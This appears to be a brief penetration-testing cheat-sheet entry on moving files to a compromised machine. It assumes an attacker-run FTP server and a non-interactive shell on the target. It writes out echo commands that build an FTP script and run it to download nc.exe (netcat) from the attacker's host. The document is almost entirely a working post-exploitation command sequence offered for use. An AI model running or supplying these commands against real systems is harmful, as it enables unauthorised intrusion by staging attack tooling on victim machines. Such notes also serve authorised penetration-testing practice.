Requirements

  • FTP server on attacker’s machine
  • Non-interactive shell on targetlinux

On remote:

echo open $ip > ftp.txt
echo USER attacker >> ftp.txt
echo p@ssword >> ftp.txt
echo bin >> ftp.txt # enable binary transfer
echo GET nc.exe >> ftp.txt
echo bye >> ftp.txt
ftp -v -n -s:ftp.txt